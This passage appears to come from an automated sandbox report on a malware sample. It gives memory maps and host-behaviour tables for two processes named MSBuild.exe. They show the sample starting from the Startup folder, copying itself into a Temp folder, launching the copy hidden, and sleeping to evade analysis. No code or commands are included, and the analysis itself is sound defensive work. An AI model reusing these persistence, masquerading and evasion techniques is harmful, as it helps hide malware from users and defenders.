| kernelbase.dll | 0x75a10000 | 0x75a59fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75c90000 | 0x75d2ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75d30000 | 0x75dfbfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75fd0000 | 0x75fe8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76040000 | 0x760ebfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76d40000 | 0x76d8dfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77170000 | 0x77238fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77240000 | 0x772dcfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x773f0000 | 0x77490fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x774a0000 | 0x774f6fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77760000 | 0x77833fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77840000 | 0x7797bfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x779a0000 | 0x779befff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77a80000 | 0x77a80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Process #5: msbuild.exe
7
0
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\roaming\microsoft\windows\start menu\programs\startup\msbuild.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MSBuild.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:04:06, Reason: Autostart |
| Unmonitor | End Time: 00:04:19, Reason: Self Terminated |
| Monitor Duration | 00:00:13 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1dc |
| Parent PID | 0x664 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
224
0x
7B8
0x
770
0x
7E8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x001cffff | Private Memory | rw |
|
|
|
- |
| msbuild.exe | 0x001d0000 | 0x0031efff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000320000 | 0x00320000 | 0x00320fff | Pagefile Backed Memory | rw |
|
|
|
- |
| rpcss.dll | 0x00330000 | 0x0038bfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000330000 | 0x00330000 | 0x00331fff | Pagefile Backed Memory | r |
|
|
|
- |
| windowsshell.manifest | 0x00340000 | 0x00340fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000340000 | 0x00340000 | 0x00340fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000350000 | 0x00350000 | 0x00351fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000360000 | 0x00360000 | 0x00360fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000370000 | 0x00370000 | 0x00371fff | Pagefile Backed Memory | r |
|
|
|
- |
| oleaccrc.dll | 0x00380000 | 0x00380fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000390000 | 0x00390000 | 0x00391fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.1.db | 0x003a0000 | 0x003a3fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003a6fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x00487fff | Pagefile Backed Memory | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001d.db | 0x00490000 | 0x004b0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000004c0000 | 0x004c0000 | 0x004c0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000004d0000 | 0x004d0000 | 0x004d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cversions.2.db | 0x004e0000 | 0x004e3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000004f0000 | 0x004f0000 | 0x005effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005f0000 | 0x005f0000 | 0x006f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x012fffff | Pagefile Backed Memory | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db | 0x01300000 | 0x0132ffff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x01330000 | 0x01333fff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01340000 | 0x013a5fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000013b0000 | 0x013b0000 | 0x013bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000013c0000 | 0x013c0000 | 0x014bffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x014c0000 | 0x0178efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001790000 | 0x01790000 | 0x018bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001790000 | 0x01790000 | 0x0186efff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001870000 | 0x01870000 | 0x01870fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001880000 | 0x01880000 | 0x018bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001940000 | 0x01940000 | 0x01a3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001a60000 | 0x01a60000 | 0x01b5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001b60000 | 0x01b60000 | 0x01f52fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002040000 | 0x02040000 | 0x0213ffff | Private Memory | rw |
|
|
|
- |
| ieframe.dll | 0x6d770000 | 0x6e1effff | Memory Mapped File | rwx |
|
|
|
- |
| wpdshext.dll | 0x6ea30000 | 0x6ec67fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr90.dll | 0x6f380000 | 0x6f422fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp90.dll | 0x6f430000 | 0x6f4bdfff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x6f8e0000 | 0x6f90dfff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x721b0000 | 0x721fbfff | Memory Mapped File | rwx |
|
|
|
- |
| winmm.dll | 0x72200000 | 0x72231fff | Memory Mapped File | rwx |
|
|
|
- |
| oleacc.dll | 0x729e0000 | 0x72a1bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74590000 | 0x745b0fff | Memory Mapped File | rwx |
|
|
|
- |
| gdiplus.dll | 0x74b30000 | 0x74cbffff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74cc0000 | 0x74cfffff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x74d00000 | 0x74df4fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74e40000 | 0x74fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75d90000 | 0x75daafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75db0000 | 0x75dbbfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75e60000 | 0x75e6afff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75ed0000 | 0x75edbfff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x75ee0000 | 0x75f06fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f10000 | 0x75f59fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75f90000 | 0x760acfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x76140000 | 0x76151fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76160000 | 0x7620bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76270000 | 0x762bdfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x762c0000 | 0x7634efff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x76380000 | 0x7639efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76430000 | 0x764cffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x764d0000 | 0x76526fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76530000 | 0x765b2fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x765c0000 | 0x77209fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x77220000 | 0x77238fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x77240000 | 0x77284fff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77290000 | 0x77384fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x77390000 | 0x774ebfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x774f0000 | 0x775bbfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x775c0000 | 0x77660fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77670000 | 0x77743fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x77750000 | 0x77885fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77890000 | 0x7792cfff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x77930000 | 0x77accfff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x77b10000 | 0x77d0afff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77d10000 | 0x77e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77e50000 | 0x77e59fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77e60000 | 0x77f28fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77f30000 | 0x77f34fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77f50000 | 0x77f50fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\BGC6U8~1\AppData\Local\Temp\\MSInstall\MSBuild.exe | file_attributes = _O_WRONLY | _O_BINARY |
|
1 | |
| Create Directory | C:\Users\BGC6U8~1\AppData\Local\Temp\\MSInstall | - |
|
1 | |
| Write | C:\Users\BGC6U8~1\AppData\Local\Temp\\MSInstall\MSBuild.exe | size = 676352 |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\BGC6U8~1\AppData\Local\Temp\\MSInstall\MSBuild.exe | show_window = SW_HIDE |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 10000 milliseconds (10.000 seconds) |
|
1 | |
| Get Time | type = System Time, time = 2018-10-09 11:33:45 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 82228 |
|
1 |
Process #6: msbuild.exe
1
0
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\temp\msinstall\msbuild.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\MSInstall\MSBuild.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:04:18, Reason: Child Process |
| Unmonitor | End Time: 00:04:39, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:21 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x64 |
| Parent PID | 0x1dc (c:\users\bgc6u8oy yxgxkr\appdata\roaming\microsoft\windows\start menu\programs\startup\msbuild.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
7EC
0x
7D4
0x
15C
0x
138
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x0010ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0021ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0022ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0023ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000340000 | 0x00340000 | 0x00407fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000410000 | 0x00410000 | 0x0041ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000420000 | 0x00420000 | 0x00420fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x00430fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x0044ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000460000 | 0x00460000 | 0x0049ffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x00000000004a0000 | 0x004a0000 | 0x005a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x005bffff | Private Memory | - |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005cffff | Private Memory | - |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x005effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x0068ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000690000 | 0x00690000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x006d0000 | 0x0072bfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000006d0000 | 0x006d0000 | 0x0076ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000790000 | 0x00790000 | 0x007cffff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000008a0000 | 0x008a0000 | 0x008dffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x00000000008e0000 | 0x008e0000 | 0x009befff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000a80000 | 0x00a80000 | 0x00b7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000bd0000 | 0x00bd0000 | 0x00ccffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00cd0000 | 0x00f9efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001070000 | 0x01070000 | 0x0116ffff | Private Memory | rw |
|
|
|
- |
| msbuild.exe | 0x01330000 | 0x013ddfff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000013e0000 | 0x013e0000 | 0x01fdffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001fe0000 | 0x01fe0000 | 0x03fdffff | Private Memory | rw |
|
|
|
- |
| system.core.ni.dll | 0x6b780000 | 0x6be2dfff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x6be30000 | 0x6c7a8fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x6c7b0000 | 0x6d76efff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.visualbasic.ni.dll | 0x6e3f0000 | 0x6e5c5fff | Memory Mapped File | rwx |
|
|
|
- |
| clr.dll | 0x6e5d0000 | 0x6ec61fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x6eda0000 | 0x6ee19fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x6ee20000 | 0x6ee69fff | Memory Mapped File | rwx |
|
|
|
- |
| clrjit.dll | 0x73690000 | 0x736fdfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr110_clr0400.dll | 0x73900000 | 0x739d2fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74cc0000 | 0x74cfffff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75db0000 | 0x75dbbfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f10000 | 0x75f59fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76160000 | 0x7620bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76270000 | 0x762bdfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x76380000 | 0x7639efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76430000 | 0x764cffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x764d0000 | 0x76526fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x77220000 | 0x77238fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x77390000 | 0x774ebfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x774f0000 | 0x775bbfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x775c0000 | 0x77660fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77670000 | 0x77743fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77890000 | 0x7792cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77d10000 | 0x77e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77e50000 | 0x77e59fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77e60000 | 0x77f28fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77f50000 | 0x77f50fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 30000 milliseconds (30.000 seconds) |
|
1 |
